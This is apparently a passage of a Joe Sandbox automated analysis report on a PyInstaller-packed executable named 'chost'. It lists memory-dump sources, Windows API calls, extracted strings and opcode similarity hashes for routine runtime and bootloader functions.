                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2391419544.00007FF69439E000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2391419544.00007FF6943A2000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2391492143.00007FF6943A4000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_16_2_7ff694360000_chost.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: Value$ErrorLast
                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                        • API String ID: 2506987500-0
                                                                                                                                                                                                                                        • Opcode ID: f3ef772190a77067448dcdc891e93f0fce571c39ad65bd9bbfe034f894ce387b
                                                                                                                                                                                                                                        • Instruction ID: e0e660be6139aedb7bc65fd876fe121ba12b3255fe05e402be53fa66be4464bb
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: f3ef772190a77067448dcdc891e93f0fce571c39ad65bd9bbfe034f894ce387b
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 14111530A0C642C2FA74A7739AD113D6192EF447A4F14C7BCE9AED67D6DE2CA481C701
                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                        • GetCurrentProcessId.KERNEL32(?,?,?,?,00000000,00000000,?,00000000,00007FF694361B6A), ref: 00007FF69436295E
                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000010.00000002.2391331452.00007FF694361000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FF694360000, based on PE: true
                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2391291069.00007FF694360000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2391376200.00007FF69438B000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2391419544.00007FF69439E000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2391419544.00007FF6943A2000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2391492143.00007FF6943A4000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_16_2_7ff694360000_chost.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: CurrentProcess
                                                                                                                                                                                                                                        • String ID: %s: %s$Error$Error [ANSI Fallback]$[PYI-%d:ERROR]
                                                                                                                                                                                                                                        • API String ID: 2050909247-2962405886
                                                                                                                                                                                                                                        • Opcode ID: 9e805cce3db004805378da731f60641a61a9f8723a57293993104ba7ce00817f
                                                                                                                                                                                                                                        • Instruction ID: 0140eb5a2f4093fad854a4630648e13eb0062c883a5c13996e8e5e456cd7bad8
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 9e805cce3db004805378da731f60641a61a9f8723a57293993104ba7ce00817f
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 3231C962B1968292E7309773A8815EA7295FF887D4F408139FE8DC3755EF7CD546C600
                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000010.00000002.2391331452.00007FF694361000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FF694360000, based on PE: true
                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2391291069.00007FF694360000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2391376200.00007FF69438B000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2391419544.00007FF69439E000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2391419544.00007FF6943A2000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2391492143.00007FF6943A4000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_16_2_7ff694360000_chost.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: DeleteDestroyDialogHandleIconIndirectModuleObjectParam
                                                                                                                                                                                                                                        • String ID: Unhandled exception in script
                                                                                                                                                                                                                                        • API String ID: 3081866767-2699770090
                                                                                                                                                                                                                                        • Opcode ID: 39c06ba8bf9b0b274a05e8f7e17acb9149a8f0f807fdaf6a00a55f32f6777a83
                                                                                                                                                                                                                                        • Instruction ID: 5d38c67b2b2d211b82ec4a952f5596d4b307ef1577acbea10c63d916ea519da5
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 39c06ba8bf9b0b274a05e8f7e17acb9149a8f0f807fdaf6a00a55f32f6777a83
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 38315F7261968289EB30EB32E8952F97360FF89784F544179EA4D87B5ADF3CD104C700
                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                        • GetCurrentProcessId.KERNEL32(?,00000000,00000000,FFFFFFFF,00000000,00007FF69436918F,?,00007FF694363C55), ref: 00007FF694362BA0
                                                                                                                                                                                                                                        • MessageBoxW.USER32 ref: 00007FF694362C2A
                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000010.00000002.2391331452.00007FF694361000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FF694360000, based on PE: true
                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2391291069.00007FF694360000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2391376200.00007FF69438B000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2391419544.00007FF69439E000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2391419544.00007FF6943A2000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2391492143.00007FF6943A4000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_16_2_7ff694360000_chost.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: CurrentMessageProcess
                                                                                                                                                                                                                                        • String ID: WARNING$Warning$[PYI-%d:%ls]
                                                                                                                                                                                                                                        • API String ID: 1672936522-3797743490
                                                                                                                                                                                                                                        • Opcode ID: 9e6d9589c2ecbe46adae8e106eadd318faf54c8367477cb0129d25f7ec3a12f1
                                                                                                                                                                                                                                        • Instruction ID: 1ed238c28ff3441aacd5d3e953c375920b0b8e908db4c8850ad09c56c7be8d23
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 9e6d9589c2ecbe46adae8e106eadd318faf54c8367477cb0129d25f7ec3a12f1
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 5121A372708B4292E7209B26F8857AA73A4EB88780F40813AEA8DD7756DE3CD605C700
                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                        • GetCurrentProcessId.KERNEL32(?,00000000,00000000,?,00000000,00007FF694361B99), ref: 00007FF694362760
                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000010.00000002.2391331452.00007FF694361000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FF694360000, based on PE: true
                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2391291069.00007FF694360000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2391376200.00007FF69438B000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2391419544.00007FF69439E000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2391419544.00007FF6943A2000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2391492143.00007FF6943A4000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_16_2_7ff694360000_chost.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: CurrentProcess
                                                                                                                                                                                                                                        • String ID: ERROR$Error$Error [ANSI Fallback]$[PYI-%d:%s]
                                                                                                                                                                                                                                        • API String ID: 2050909247-1591803126
                                                                                                                                                                                                                                        • Opcode ID: 16defea7d45dc340f891dcb1518e5bd63c50e449678e4b46de0281de23a8290b
                                                                                                                                                                                                                                        • Instruction ID: acb090b7fed5302f8a1616eebe57da262de0da86608b3f2e97c5dc219c5d32fa
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 16defea7d45dc340f891dcb1518e5bd63c50e449678e4b46de0281de23a8290b
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 86217172A1978292E630DB62B8817EAB394EB88384F408179FA8CC3759DF7CD549C740
                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000010.00000002.2391331452.00007FF694361000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FF694360000, based on PE: true
                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2391291069.00007FF694360000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2391376200.00007FF69438B000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2391419544.00007FF69439E000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2391419544.00007FF6943A2000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2391492143.00007FF6943A4000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_16_2_7ff694360000_chost.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: AddressFreeHandleLibraryModuleProc
                                                                                                                                                                                                                                        • String ID: CorExitProcess$mscoree.dll
                                                                                                                                                                                                                                        • API String ID: 4061214504-1276376045
                                                                                                                                                                                                                                        • Opcode ID: 644f40749f2397ccfee8900b191f86882f652c7814ccefc594fcc00cef1e1075
                                                                                                                                                                                                                                        • Instruction ID: 0d05e3bfdaf80de667f5b7547d690a6faa0e73dcae0319fba1f68cf6e2594ce4
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 644f40749f2397ccfee8900b191f86882f652c7814ccefc594fcc00cef1e1075
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 05F0AF31A09A07C1FA248B32A4C53799320EF85761F5482BDD66EC62E4DF2CD044C300
                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000010.00000002.2391331452.00007FF694361000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FF694360000, based on PE: true
                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2391291069.00007FF694360000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2391376200.00007FF69438B000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2391419544.00007FF69439E000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2391419544.00007FF6943A2000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2391492143.00007FF6943A4000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_16_2_7ff694360000_chost.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: _set_statfp
                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                        • API String ID: 1156100317-0
                                                                                                                                                                                                                                        • Opcode ID: bce21d2362216a5e504affcf34f2858e363de54600403cac3d1eeb36cb2ab404
                                                                                                                                                                                                                                        • Instruction ID: cf1cf84fd7519ef8d569f3edcb94ba82d80560a5becd3dfce82a468c10d313cf
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: bce21d2362216a5e504affcf34f2858e363de54600403cac3d1eeb36cb2ab404
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: FC11BF62E0CA1301FA769176D8D6375A044EF98360E24C6BCEB6FC73D6AE2CA941C100
                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                        • FlsGetValue.KERNEL32(?,?,?,00007FF69437A613,?,?,00000000,00007FF69437A8AE,?,?,?,?,?,00007FF69437A83A), ref: 00007FF69437B41F
                                                                                                                                                                                                                                        • FlsSetValue.KERNEL32(?,?,?,00007FF69437A613,?,?,00000000,00007FF69437A8AE,?,?,?,?,?,00007FF69437A83A), ref: 00007FF69437B43E
                                                                                                                                                                                                                                        • FlsSetValue.KERNEL32(?,?,?,00007FF69437A613,?,?,00000000,00007FF69437A8AE,?,?,?,?,?,00007FF69437A83A), ref: 00007FF69437B466
                                                                                                                                                                                                                                        • FlsSetValue.KERNEL32(?,?,?,00007FF69437A613,?,?,00000000,00007FF69437A8AE,?,?,?,?,?,00007FF69437A83A), ref: 00007FF69437B477
                                                                                                                                                                                                                                        • FlsSetValue.KERNEL32(?,?,?,00007FF69437A613,?,?,00000000,00007FF69437A8AE,?,?,?,?,?,00007FF69437A83A), ref: 00007FF69437B488
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000010.00000002.2391331452.00007FF694361000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FF694360000, based on PE: true
                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2391291069.00007FF694360000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2391376200.00007FF69438B000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2391419544.00007FF69439E000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2391419544.00007FF6943A2000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2391492143.00007FF6943A4000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_16_2_7ff694360000_chost.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: Value
                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                        • API String ID: 3702945584-0
                                                                                                                                                                                                                                        • Opcode ID: e370891a427e995cf622d6c66c6ae617f18e5219a23357883517039299fedc16
                                                                                                                                                                                                                                        • Instruction ID: c3816e7ccb4b4bd9dcc8aac9f5bf226c5acc07ae850c02c62bca5ca817c8b057
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: e370891a427e995cf622d6c66c6ae617f18e5219a23357883517039299fedc16
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: EE113D31A0C642C1FA78A7779AD21796161DF447B4F64C3BCEABDD67D6DE2CA441C200
                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000010.00000002.2391331452.00007FF694361000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FF694360000, based on PE: true
                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2391291069.00007FF694360000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2391376200.00007FF69438B000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2391419544.00007FF69439E000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2391419544.00007FF6943A2000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2391492143.00007FF6943A4000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_16_2_7ff694360000_chost.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: Value
                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                        • API String ID: 3702945584-0
                                                                                                                                                                                                                                        • Opcode ID: e449caa10890978289f0fc2f631dee428fb70040431ae2bf3103bb36de88fb08
                                                                                                                                                                                                                                        • Instruction ID: 19b0fa22ed921aca760f9be08ab730e1ca0926be049320a6483ac4a7e6d976ec
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: e449caa10890978289f0fc2f631dee428fb70040431ae2bf3103bb36de88fb08
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: E3110630A0D207C5FA78627348D227E1191DF45324F58C7BCDABEDA2C2DD2DB481C241
                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000010.00000002.2391331452.00007FF694361000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FF694360000, based on PE: true
                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2391291069.00007FF694360000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2391376200.00007FF69438B000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2391419544.00007FF69439E000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2391419544.00007FF6943A2000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2391492143.00007FF6943A4000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_16_2_7ff694360000_chost.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: _invalid_parameter_noinfo
                                                                                                                                                                                                                                        • String ID: verbose
                                                                                                                                                                                                                                        • API String ID: 3215553584-579935070
                                                                                                                                                                                                                                        • Opcode ID: 8c3a45f75ca5c0a3459ca2e96ae2fbbf181a3d63a640e770f0a7cf37c7606cec
                                                                                                                                                                                                                                        • Instruction ID: 42273c6188cbe88440b9ca7e3ba895a8a964c810ab7160691afe433292c5d24c
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 8c3a45f75ca5c0a3459ca2e96ae2fbbf181a3d63a640e770f0a7cf37c7606cec
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 9E918B32A0CA46C5E7B59E36D4A437D36A1EB44BA4F44C17ADADAC62D6DF3CE805C301
                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000010.00000002.2391331452.00007FF694361000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FF694360000, based on PE: true
                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2391291069.00007FF694360000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2391376200.00007FF69438B000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2391419544.00007FF69439E000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2391419544.00007FF6943A2000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2391492143.00007FF6943A4000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_16_2_7ff694360000_chost.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: _invalid_parameter_noinfo
                                                                                                                                                                                                                                        • String ID: UTF-16LEUNICODE$UTF-8$ccs
                                                                                                                                                                                                                                        • API String ID: 3215553584-1196891531
                                                                                                                                                                                                                                        • Opcode ID: 4ea7f6e1ba59c177a711b7ec70ee344f27d005a52efb2894dd87f7f788f8515e
                                                                                                                                                                                                                                        • Instruction ID: c110ae03df0e133b930d4504e237ea070e2f33ccaea4a1adbe7c69e3ef5f2956
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 4ea7f6e1ba59c177a711b7ec70ee344f27d005a52efb2894dd87f7f788f8515e
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 46816B72E0C243C6FA744E3B81902792AA0FB11B48F65C0BDDA89D76DADF2DA901D741
                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000010.00000002.2391331452.00007FF694361000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FF694360000, based on PE: true
                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2391291069.00007FF694360000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2391376200.00007FF69438B000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2391419544.00007FF69439E000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2391419544.00007FF6943A2000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2391492143.00007FF6943A4000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_16_2_7ff694360000_chost.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: CurrentImageNonwritableUnwind__except_validate_context_record
                                                                                                                                                                                                                                        • String ID: csm
                                                                                                                                                                                                                                        • API String ID: 2395640692-1018135373
                                                                                                                                                                                                                                        • Opcode ID: c7f5fdff7c0b40b6635b3f9850cf21a5be83d788788a684f503aa9329af71794
                                                                                                                                                                                                                                        • Instruction ID: f33db39e2dfaab69e9516923f1277f205e740758d65645103020de53731904ff
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: c7f5fdff7c0b40b6635b3f9850cf21a5be83d788788a684f503aa9329af71794
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 8851B232B296438AEB64CF26E489A387791FB44B98F14C178DA4E87748DF7CE841C700
                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000010.00000002.2391331452.00007FF694361000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FF694360000, based on PE: true
                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2391291069.00007FF694360000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2391376200.00007FF69438B000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2391419544.00007FF69439E000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2391419544.00007FF6943A2000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2391492143.00007FF6943A4000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_16_2_7ff694360000_chost.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: CallEncodePointerTranslator
                                                                                                                                                                                                                                        • String ID: MOC$RCC
                                                                                                                                                                                                                                        • API String ID: 3544855599-2084237596
                                                                                                                                                                                                                                        • Opcode ID: 1984f943fe60021c6db05f5888f7dd086acc6d0e2a461e0c712dd9be4fa02006
                                                                                                                                                                                                                                        • Instruction ID: a931f90d961dafcbe0b4b99237eddf6433d600b5eb2293fceafd16cb6f40851d
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 1984f943fe60021c6db05f5888f7dd086acc6d0e2a461e0c712dd9be4fa02006
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 48617332908BC685D7709F26E4823AAB7A0FB857D4F048269EB9D47B55DF7CD194CB00
                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000010.00000002.2391331452.00007FF694361000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FF694360000, based on PE: true
                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2391291069.00007FF694360000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2391376200.00007FF69438B000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2391419544.00007FF69439E000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2391419544.00007FF6943A2000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2391492143.00007FF6943A4000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_16_2_7ff694360000_chost.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: Frame$EmptyHandler3::StateUnwind__except_validate_context_record
                                                                                                                                                                                                                                        • String ID: csm$csm
                                                                                                                                                                                                                                        • API String ID: 3896166516-3733052814
                                                                                                                                                                                                                                        • Opcode ID: 1b872e8f6993e9c5779cc40e3c84c693849f7921638dfce8d08fafba9ab8d571
                                                                                                                                                                                                                                        • Instruction ID: a6280de1c0bab613fee23de0b9244be09294a148c034884cb2768bd479b885f6
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 1b872e8f6993e9c5779cc40e3c84c693849f7921638dfce8d08fafba9ab8d571
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 6D51603290828386EB748E37908636877A1FB55B94F249279DA5D87B99CF3CE850CB05
                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                        • CreateDirectoryW.KERNEL32(00000000,?,00007FF69436352C,?,00000000,00007FF694363F23), ref: 00007FF694367F22
                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000010.00000002.2391331452.00007FF694361000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FF694360000, based on PE: true
                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2391291069.00007FF694360000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2391376200.00007FF69438B000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2391419544.00007FF69439E000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2391419544.00007FF6943A2000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2391492143.00007FF6943A4000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_16_2_7ff694360000_chost.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: CreateDirectory
                                                                                                                                                                                                                                        • String ID: %.*s$%s%c$\
                                                                                                                                                                                                                                        • API String ID: 4241100979-1685191245
                                                                                                                                                                                                                                        • Opcode ID: b1106a047486010b66b16d7d561c3e0e79f8eec2dc114c611d5a943da294bb6a
                                                                                                                                                                                                                                        • Instruction ID: c785f8d82bda67997179227cf3433a2a6e8fb5056e6c619aa0187108888648f2
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: b1106a047486010b66b16d7d561c3e0e79f8eec2dc114c611d5a943da294bb6a
